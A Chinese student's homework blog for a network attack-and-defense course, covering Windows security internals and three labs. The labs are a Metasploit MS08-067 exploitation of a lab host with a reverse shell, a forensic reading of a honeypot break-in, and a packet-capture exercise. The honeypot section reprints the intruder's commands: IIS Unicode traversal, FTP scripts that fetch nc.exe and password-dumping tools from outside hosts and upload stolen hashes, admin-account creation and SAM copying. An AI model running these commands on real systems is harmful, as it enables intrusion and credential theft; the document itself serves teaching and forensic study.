20199123 2019-2020-2 《网络攻防实践》第7周作业

20199123 2019-2020-2 《网络攻防实践》第7周作业

0 总体结构

本次作业属于那个课程 《网络攻防实践》
这个作业要求在哪里 《网络攻防实践》第七周作业
我在这个课程的目标是 学习网络攻防相关技术、掌握网络攻防相关能力
这个作业在哪个具体方面帮助我实现目标 学习Windows操作系统安全攻防
作业正文 下述正文
其他参考文献 见文末

1.实践内容

1.1 Windows操作系统基本框架概述

  • Windows操作系统版本发布过程列表

  • Windows操作系统的基本结构:分为运行于处理器特权模式(ring0)的操作系统内核,以及运行在处理器非特权模式(ring3)的用户空间代码

    Windows操作系统基本模块 详细内容
    内核态_Windows执行体 即Windows内核核心文件ntoskrnl.exe的上层接口,包含基本的操作系统内核服务,如进程与线程管理、内存管理、I/O管理、网络连接、进程间通信,以及安全服务;
    内核态_Windows内核体 即Windows内核核心文件ntoskrnl.exe中函数实现与硬件体系结构支持代码,实现底层的操作系统功能,如线程调度、中断和异常分发处理、多处理器同步机制等,同时也提供了一组内核例程与基本对象,以帮助执行体来实现高层次的功能服务;
    内核态_设备驱动程序 包括将用户I/O操作映射为特定硬件设备I/O请求的硬件设备驱动程序,以及文件系统与网络设备驱动程序。该部分支持通过数字签名认证的第三方硬件厂商的硬件设备驱动程序加载进入内核执行;
    内核态_硬件抽象层 即hal.dll文件,是用于屏蔽Windows内核与平台硬件差异性的底层代码
    内核态_Windows窗口与图形界面接口内核实现代码 即win 32k.sys
    用户态_系统支持进程 Windows开机自动启动的系统内建服务进程,如负责登录用户身份认证的logon进程、会话管理进程等;
    用户态_环境子系统服务进程 为操作系统运行环境提供支持的服务进程,Windows XP 只支持Windows环境子系统,而符合POSIX标准的环境子系统则作为UNIX产品的免费服务所提供;
    用户态_服务进程 通过Windows的服务管理机制所启动的一系列系统及网络服务,如Task Scheduler任务管理器服务,Microsoft SQL Sever网络服务等;
    用户态_用户应用软件 用户态执行的各类用户应用软件;
    用户态_核心子系统DLL 即kernel32.dll/user32.dll/gdi32.dll/advapi32.dll等动态连接库文件,作为用户态服务进程与应用软件和操作系统内核的交互接口,将用户态程序调用的系统API函数映射到相应的一个或多个Windows内部的系统服务调用;

    PS:2个概念介绍一下,做个记忆的备份

    1、宏内核:(monolithic)即大量的内核模块与设备驱动程序共享内核态内存空间,这使得任意的内核模块或设备驱动程序都可能破坏其他内核模块数据,这种宏内核机制也使得Windows操作系统容易遭受以驱动方式植入内存的Rootkit的危害,为了避免这类攻击,最新的Windows7缺省要求所有请求安装进入内核执行的设备驱动程序都需要经过数字签名,这能够有效地提升内核的安全性;

    2、ntoskrnl.exe:Windows 操作系统的一个重要内核程序文件,里面存储了大量的二进制内核代码,用于调度系统

  • Windows进程和线程管理机制:Windows将进程视作可执行程序运行时刻的容器,其进程与线程结构示意图如下。Windows线程是指令执行的具体载体,其线程控制块TCB中包含程序执行的上下文信息等;

  • Windows内存管理机制:Windows的虚拟内存空间分为系统核心内存区和用户内存区间两部分,对虚拟内存布局空间的深入分析与了解是理解Windows平台软件渗透攻击过程的基本条件;

  • Windows文件管理机制:Windows使用NTFS(NT File System)管理文件系统,NTFS文件系统基于ACL访问控制列表来保证文件资源读/写的安全性;Windows上可执行文件采用PE(Portable Executable)格式,其结构如下;

    PS: ACL是一种基于包过滤的访问控制技术,它可以根据设定的条件对接口上的数据包进行过滤,允许其通过或丢弃。访问控制列表被广泛地应用于路由器和三层交换机,借助于访问控制列表,可以有效地控制用户对网络的访问,从而最大程度地保障网络安全。

  • Windows注册表管理机制:Windows注册表在作为系统全局配置、用户和应用软件配置信息的存储仓库,在Windows系统配置和控制方面承担着关键角色;注册表中的系统自启动挂接点(Auto Start Extensibility Points,ASEP)是注册应用软件可以随系统引导而自动运行,因此也是很多恶意代码及流氓软件普遍的攻击目标;

  • Windows网络机制

1.2 Windows操作系统的安全体系结构与机制

  • Windows安全体系结构:图中最关键的是位于内核的SRM(Security Reference Monitor)安全引用监控器,以及位于用户态的LSASS(Local Security Authority Subsystem Service)安全服务,他们与Winlogon/Netlogon及Eventlog等服务一起,实现了对主体用户的身份认证机制、对所有资源对象的访问控制机制,以及对访问的安全审计机制

  • Windows身份认证机制:Windows操作系统中以安全主体概念来包含所有进行系统资源访问请求的实体对象,有用户、用户组和计算机三大类,对于每个安全主体,以时间和空间上都全局唯一的SID安全标识符来进行标识;Windows为每个用户和计算机设置账户进行管理,本地Administrator和SYSTEM账户拥有最高权限;Windows支持本地身份认证和网络身份认证两种方式,分别对在本地系统登录和远程网络访问的主体进行合法性验证,具体实现原理如图:

    PS:Kerberos的相关信息可以查看这篇博客 kerberos认证原理 ,写的很好;

  • Windows授权与访问控制机制:Windows的授权与访问控制机制是基于引用监控器模型,由内核中的SRM模块与用户态的LSASS服务共同来实施,由SRM作为安全主体访问对象资源时的中介,根据设定的访问控制列表进行授权访问;

  • Windows安全审计机制:系统审计策略在本地安全策略中由系统管理员定义,来确定系统对那些实践进行记录;

1.3 Windows远程安全攻防技术

  • 目前Windows远程攻击技术可以分为如下几类:远程口令猜测与破解攻击、攻击Windows网络服务、攻击Windows客户端及用户

  • 漏洞的利用、发现及修补:这个主要是黑客和厂商之间的一种平衡协议,黑客发现漏洞告知厂商,厂商给予一定的回报,然后待厂商修补漏洞并公开发布之后,黑客可以发布漏洞的一些攻击代码;

  • 安全漏洞公开披露信息库:CVE(Common Vulnerability Exposures,通用漏洞披露库)、NVD(National Vulnerability Database)、OSVDB则是由安全社区创建的一个独立的、开源的安全漏洞信息库;

  • 针对特定目标的渗透测试攻击过程:针对特定目标典型的渗透攻击过程包括漏洞扫描测试、查找针对发现漏洞的渗透代码、实施渗透测试这几个环节

  • 使用Metasploit软件实施渗透测试,软件结构图如下:(书上的图都成一片黑煤炭了,所以自己画了个图

  • Metasploit Console终端中支持的主要命令列表:

  • Windows远程口令猜测与破解攻击:Windows通过基于服务器消息块(Server Message Block,SMB)协议承载的文件与打印共享服务来为网络用户提供远程访问文件系统和打印机的支持;远程口令字交换通信窃听与破解中常用的网络身份认证协议为LanMan、NTLM和Kerberos,其中Kerberos的上面有介绍;

  • 远程口令猜测与破解的防范措施:最根本的是用户设置强口令;其次有尽量关闭不必要开放的易受远程口令猜测攻击网络服务配置主机防火墙来限制对上述端口的服务、利用网络防火墙来限制服务等;

  • Windows网络服务远程渗透攻击:

    通过这些默认开房端口所提供的网络及本地服务一直以来都是Windows系统远程渗透攻击和恶意代码主动传播的主要目标;

  • Windows服务中主要的渗透攻击有: 针对SMB网络服务的漏洞攻击、针对MSRPC网络服务的漏洞攻击、针对Windows系统上微软网络服务的远程渗透攻击、针对Windows系统上第三方网络服务的远程渗透攻击;

  • 网络服务远程渗透攻击的防范措施:从软件设计开发根源上尽可能减少安全漏洞的出现,及时进行漏洞补丁修护;作为系统管理员和使用者,应尽可能快速更新与应用软件安全补丁;在安全漏洞从被意外公布和利用到补丁发布的这段“零日”漏洞时间中,管理员要尽快对安全敏感的服务器做测试和实施可用的攻击缓解配置;利用服务软件厂商及社区提供的安全核对清单来对服务进行安全配置,利用一些安全插件;利用漏洞扫描软件扫描漏洞及时进行修复等;

1.4 Windows本地安全攻防技术

  • Windows本地特权提升:主要通过DLL注入和破解本地程序安全漏洞提升本地特权;
  • Windows敏感信息窃取:Windows系统口令密文提取技术中使用磁盘修复工具包中的rdisk工具创建SAM备份文件副本,并且使用pwdumpX系列工具直接从SAM文件或活动目录中提取口令字密文
  • Windows消踪灭迹:这里主要是攻击者攻击之后需要清除自己的痕迹,一般采取的方式有:关闭审计功能、清理事件日志;
  • Windows远程控制与后门程序:攻击者在目标系统上完成提权、信息窃取、掩灭踪迹后为了下次能再次登录这才主机会设置后门程序。

2.实践过程

2.1 动手实践:Metasploit Windows Attack

  • 任务:使用Metasploit软件进行Windows远程渗透攻击实验;使用Windows Attacker/BT4攻击机尝试对Windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击,获取目标主机访问权;

  • 实践步骤:

    Step 0:今天上课的时候有老师讲到其他协议的载荷的时候我就想到了这次攻防的这个漏洞攻击,所以去查了下这个漏洞的一些知识补充到这里。

    • 先说一下这个漏洞。这个漏洞最开始是在教材的257页上有一小点介绍,然后我看了下256页的以MSRPC over SMB为攻击通道的远程代码执行后果安全漏洞列表,发现了这个漏洞的一下详细信息如下图;

    • 从图中可以知道这个漏洞的名字是Sever服务器路径规范化处理不当漏洞,这在下面的search ms08_067命令之后也能看到;然后我回溯教材的知识点,查了网上的一个博客网络服务渗透攻击查到了这个漏洞是通过MSRPC over SMB 通道调用server服务程序中的netpathcanonicalize函数时触发的,而netpathcanonicalize函数在远程访问其他主机时,会调用netpwpathcanonicalize函数,对远程访问的路径进行规范化,而在netpwpathcanonicalize函数中发生了栈缓冲区内存错误,造成可被利用实施远程代码执行。上面的解释中提到了一个缓冲区溢出的概念,我查了一下:由于对缓冲区的边界条件缺乏检查,当向缓冲区写入数据时,超过了程序员设定的边界,从而覆盖了相邻的内存区域,造成程序的非预期行为。缓冲区溢出根据内存位置不同又分为栈溢出和堆溢出。对于栈溢出,由于程序会将函数的返回地址、调用参数、局部变量一同保存在栈中,这就给了攻击者通过缓冲区溢出修改返回地址的机会,达到修改程序流程的目的。堆是程序运行时动态分配的内存,通过new,malloc等来分配,用返回起始地址来对分配的内存进行操作,攻击者利用程序覆盖内存中的一些函数指针地址。

    • smb:远程文件盒打印机共享服务,既可以直接运行在tcp445,也可以通过调用tcp139端口来接收数据。主流漏洞 MS10-054,MS10-012等。MSRPC微软远程过程调用:TCP135,UDP135,TCP139、445。主流漏洞MS09-026,MS05-039,MS08-067等。

    • 然后是载荷的一些概念,这个概念我没查到多少资料,但是今天上课看到老师提供的另外一幅图,感觉可以互通理解;

    Step 1:选择的主机详细信息如下:

    主机 IP地址
    kali_攻击机 192.168.200.2
    Win2KServer_靶机 192.168.200.124

    Step 2:kali中输入msfconsole启动kali里面的msfconsole

    Step 3:输入search ms08_067查看漏洞ms08_067详细信息,输入use windows/smb/ms08_067_netapi进入漏洞所在文件;

    Step 4:输入show payloads显示可攻击载荷;

    Step 5:输入set payload generic/shell_reverse_tcp设置攻击的载荷为tcp的反向连接

    PS:使用set payload windows/meterpreter/reverse_tcp载荷并不能渗透攻击成功,不知道原因是啥,所以换了载荷做的渗透攻击;

    Step 6:输入show options展示渗透攻击需要设置的参数;

    Step 7:输入show targets展示可渗透攻击的靶机的操作系统及版本;

    Step 8:输入set LHOST 192.168.200.2设置渗透攻击的主机是kali;

    Step 9:输入set RHOST 192.168.200.124设置渗透攻击的靶机IP;

    Step 10:输入exploit开始渗透攻击;

    Step 11:进入到靶机的系统命令行界面,输入ipconfig/all显示靶机的操作系统和IP配置,由此渗透攻击成功;

    Step 12:皮一下,进入c盘建一个文件夹,在靶机对应的位置就能看到success文件夹了,至此第一个实践完成;

    思考:如何知道渗透攻击的获取到的靶机的权限,经思考一种方式是执行权限较高的任务,但是我对文件权限不熟悉,这个就PASS;第二种是查看账户所在的用户组,这个能懂,但是键入命令之后出来的结果我看不太懂?!所以这个地方还处于疑惑状态待解放中...

2.2 取证分析实践:解码一次成功的NT系统破解攻击

  • 任务:来自213.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106(主机名为:lab.wiretrip.net);回答下面的问题:

    1、攻击者使用了什么破解工具进行攻击?

    2、攻击者如何使用这个破解工具进入并控制了系统?

    3、当攻击者获得系统的访问权后做了什么?

    4、我们如何防止这样的攻击?

    5、你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么?

  • 实践过程:

    Step 1:使用wireshark打开log文件发现里面有可识别的HTTP协议内容可识别的SQL语句代码内容可识别的系统操作代码内容不可识别的二进制数据;那么我们需要对数据进行筛选然后才能更好的分析;

    Step 2:在wireshark中筛选http数据;发现有个GET /rfp.gif HTTP/1.1的语句,猜测rfp可能是个网站;然后我们看到一个很特殊的字符%C0%AF,查一下发现了这篇博客IIS的Unicode漏洞攻击其中说到 IIS 4.0/5.0在Unicode字符解码的实现中存在一个安全漏洞,用户可以远程通过IIS执行任意命令。当IIS打开文件时,如果该文件名包含Unicode字符,它会对它进行解码。在英文版的WIN2000中 “/”编码为“%c0%af” ,正好是在我们刚才看到的特殊字符,因此猜测存在Unicode解析错误漏洞,再根据博客后面使用/winnt/system32/cmd.exe?/c+dir测试是否存在该漏洞攻击的方式结合wireshark我们看到的log文件中的类似的语句可以基本确定存在Unicode漏洞攻击

    Step 3:然后我们看到有一个msadcs.dll文件,搜一下发现msadcs.dll文件列表中介绍了这个文件,初步判断是一个远程数据访问服务的文件,这倒是坐实了攻击者是在远程攻击一台主机;在查一下msadcs.dll的漏洞发现这篇文章NT 4.0下的msadcs.dll漏洞的利用其中介绍到RDS Security Hole,文章中的一串字符 !ADM!ROX!YOUR!WORLD! 正好与我们所分析的log文件中匹配,猜测是RDS漏洞攻击

    Step 4:接下来我把http数据流中的重要数据做了手动的提取并整理如下:

    #从关键字ftpcom中可知以下操作为从ftp服务器上下载文件
    shell (“cmd /c echo werd >> c : f u n ” ) ;
    shell ( “cmd /c echo user johna2k > ftpcom” ) ;
    shell ( “cmd /c echo hacker 2000 >> ftpcom” ) ;
    shell ( “cmd /c echo get pdump.exe >> ftpcom” ) ;
    shell ( “cmd /c echo get nc.exe>>ftpcom” ) ;
    shell ( “cmd /c echo quit>>ftpcom” )
    shell ( “cmd /c ftp – s : ftpcom- n www.nether.net” ) ;
    shell ( “cmd /c pdump .exe>>new.pass” ) ;
    shell ( “cmd /c echo userjohna2k > ftpcom2 ” ) ;
    shell ( “cmd /c echo hacker2000>>ftpcom2 ” ) ;
    shell ( “cmd /c put new . pass>>ftpcom2 ” ) ;
    shell ( “cmd /c echo quit>>ftpcom2 ” ) ;
    shell ( “cmd /c ftp -s : ftpcom2 – n www.nether.net” ) ;
    shell ( “cmd /c ftp 213.116.251.162 ” ) ;
    
    shell ( “cmd /c echo open 213.116.251.162 > ftpcom ” ) ;
    shell ( “cmd /c echo johna2k > ftpcom” ) ;
    shell ( “cmd /c echo hacker2000>>ftpcom” )
    shell ( “cmd /c echo get samdump.dll>>ftpcom” ) ;
    shell ( “cmd /c echo get pdump.exe>>ftpcom” ) ;
    shell ( “cmd /c echo get nc.exe>>ftpcom” ) ;
    shell ( “cmd /c echo quit>>ftpcom” ) ;
    shell ( “cmd /c ftp – s : ftpcom ) ;
    
    #关键字sasfile为高效读入数据的方式
    shell ( “cmd /c open 212.139.12.26 ” ) ;
    shell ( “cmd /c echo johna2k>>sasfile ” ) ;
    shell ( “cmd /c echo haxedj00>>sasfile ” ) ;
    shell ( “cmd /c echo get pdump.exe>>sasfile ” )
    shell ( “cmd /c echo get samdump.dll>>sasfile ” ) ;
    shell ( “cmd /c echo get nc.exe>>sasfile ” ) ;
    shell ( “cmd /c echo quit>>sasfile ” ) ;
    shell ( “cmd /c ftp – s : sasfile ” )
    
    shell ( “cmd /c open 213.116.251.162 ” ) ;
    shell ( “cmd /c echo johna2k>>sasfile ” ) ;
    shell ( “cmd /c echo haxedj00>>sasfile ” ) ;
    shell ( “cmd /c echo get pdump.exe>>sasfile ” ) ;
    shell ( “cmd /c echo get samdump.dll>>sasfile ” ) ;
    shell ( “cmd /c echo get nc.exe>>sasfile ” ) ;
    shell ( “cmd /c echo quit>>sasfile ” ) ;
    

    从上面的这些shell语句中可以看到攻击者使用IIS Unicode漏洞进入靶机之后,利用其msadcs.dll中的RDS漏洞允许任意代码执行的缺陷进行下面的操作,其中第一,二段的ftpcom可知攻击机打开IP为213.116.251.162的主机后,使用FTP的方式下载文件,其中pdump.exe和samdump.dll是配合使用破解口令的,使用samdump.dll拿到口令后再用pdump.exe进行破解,其中SAM(Security Account Management)文件是通过安全标识进行安全账号管理文件第二段和第三段sasfile高效读入数据的方式,因此为IP分别为212.139.12.26和213.116.251.162写入了文件,值得注意的是nc.exe文件是一个远程入侵的后门程序,便于下次攻击;

    说明:本地特权提升一般采用DLL注入或者破解本地程序安全漏洞得到,因此这里也可以理解用到的是msadcs.dll和pdump.exe和samdump.dll进行口令破解和提权;

    Step 5:再继续分析msadcs.dll的shell命令,整理如下:

    #注意关键字ProgramFiles
    shell ( ” cmd / c C : ProgramFiles CommonFiles system msadc pdump.exe > > yay.txt ” )
    shell ( ” cmd / c C : ProgramFiles CommonFiles system msadc pdump.exe > > yay.txt ” )
    #创建会话写入文件yay.txt
    shell ( ” cmd / c pdump.exe >> c : yay.txt ” )
    shell ( ” cmd / c net session > > yay2.txt ” )
    shell ( ” cmd / c net session > > yay2.txt ” )
    shell ( ” cmd / c net users > > heh.txt ” )
    shell ( ” cmd / c net users > > c : heh.txt ” )
    #创建用户组提升自己的访问权限
    shell ( “ / c n e t localgroup Domain Admin I W A M _ K E N N Y / A D D ” )
    shell ( “ / c n e t user testuser UgotHacked / A D D ” )
    shell ( “ / c n e t localgroup Administrators testuser / A D D ” )
    #利用磁盘修复工具包中的rdisk工具创建SAM文件副本
    shell ( ” cmd / crdisk – / s ” )
    shell ( ” cmd / crdisk – s “ )
    shell ( ” cmd / crdisk ” )
    shell ( ” cmd / crdisk – / s ” )
    shell ( ” cmd / crdisk – s “ )
    shell ( ” cmd / crdisk / s –“ )
    shell ( ” cmd / crdisk / s –“ )
    shell ( ” cmd / crdisk / s –“ )
    #试图删除和拷贝SAM中的数据(删除和拷贝har.txt)
    shell ( ” cmd / c typec : winnt repair sam . _ > > c : har.txt ” )
    shell ( ” cmd / c delc : inetpub wwwroot har.txt ” )
    shell (” cmd / c delc : inetpub wwwroot har.txt “)
    

    从上面的shell命令可以看到攻击机进入靶机之后查看了一些系统文件,注意关键字ProgramFiles;然后创建会话写入文件yay.txt,注意到前面有pdump.exe,这是上一步中提到的口令破解文件,因此猜测创建的会话将破解的口令写入文件yay.txt中;接下来是要创建了用户组等提升攻击机的访问权限;然后利用磁盘修复工具包中的rdisk工具创建SAM文件副本(SAM文件中可是安全账号管理哦!)可以发现创建的口令来来回回执行了好几次,我都懒得全部整理出来了,猜测这个攻击者这步操作不是很顺利?!毕竟是SAM文件!然后是尝试删除和拷贝SAM文件中的数据即删除和拷贝har.txt文件

    Step 6:然后查看HTTP数据流时发现了一些端口访问6969/6968/6868,也不是很懂,大致查了下,其中端口6969是木马Gatecrasher、Priority开放此端口,另外两个没查到

    Step 7:在最后我发现了一条HTTP的数据流,从中可以看到删除了ftp的文件,我猜测是攻击者删除之前下载的文件准备不留痕迹的溜走了。至此,这个NT分析基本完成,整个分析和书上介绍的Windows本地安全攻防技术的分析过程是一致的,可以对比起来看;这个NT分析还有个关键点是从msadcs.dll的那些POST HTTP数据流中提出shell语句,这对整个流程分析非常重要;

    PS:也可以结合TCP流进行分析,HTTP和TCP交替看进行分析会更好哦~

    Step 8:上面的NT分析让我不禁想到如果我的主机被攻击了怎么办,所以我们需要防范措施如下

    • 首先肯定是自身的口令要是强口令,这样可以增大破解口令难度;

    • 然后是定期的打补丁,修复漏洞

    • 最后是要定期的扫描自身的主机,查看是否存在漏洞等危险。

    Step 9:在查找TCP流时,可以发现echo best honeypot i've seen till now :) > rfp.txt的语句,这就证明了这是一台蜜罐主机

2.3 团队对抗实践:Windows系统远程渗透攻击与分析

  • 任务:攻击方:使用metasploit,选择metasploitable中的漏洞进行渗透攻击,获得控制权;

    ​ 防御方:使用tcpdump/wireshark/snort监听获得网络攻击的数据包文件,并结合wireshark/snort分

    ​ 析攻击过程,获取攻击者IP地址、目标IP和端口、攻击发起时间、攻击利用漏洞、攻击使用shellcode,

    ​ 以及攻击成功之后在本地执行的命令输入等信息。

  • 实践过程:

    Step 1:首先是和2.1一样的那些操作,这里不赘述了;

    Step 2:在执行exploit时,进行wireshark抓包;

    Step 3:从抓包中可得到如下分析和结果

    • 源地址192.168.200.2;目标地址192.168.200.124;
    • 源端口41315;目标端口445;
    • 攻击发起时间:从ARP协议的询问开始;
    • 攻击利用的漏洞:针对SMB网络服务的漏洞;DCERPC解析器拒绝服务漏洞;SPOOLSS打印服务假冒漏洞(MS10-061);
    • 攻击使用shellcode,以及攻击成功之后在本地执行的命令输入等信息在实践2.1中有,这里不赘述,至此第三个实践完成。

3.学习中遇到的问题及解决

  • 问题 1:NT分析的时候其实最开始是懵的;

  • 解决 1:看了下同学的博客又看了老师给的资料,再查网上的资料最后结合教材讲解顺序提出关键的shell命令进行的分析;

  • 问题 2:kali做攻击机攻击win2Kserver的时候出现no session的情况;

  • 解决 2:用了check命令发现靶机并不是vulnerable最后发现是kali的IP地址突然显示不出来了,参照博客kali没有IP解决办法完美解决;

4.实践总结

这次的攻防内容不是很难,但是NT的分析确实是新的领域,整个分析下来对教材上知识点和流程更加的清楚明确,但仍有一些不足不懂的地方,慢慢学吧~

参考资料

posted @ 2020-04-13 20:24  Jody9123  阅读(397)  评论(0编辑  收藏  举报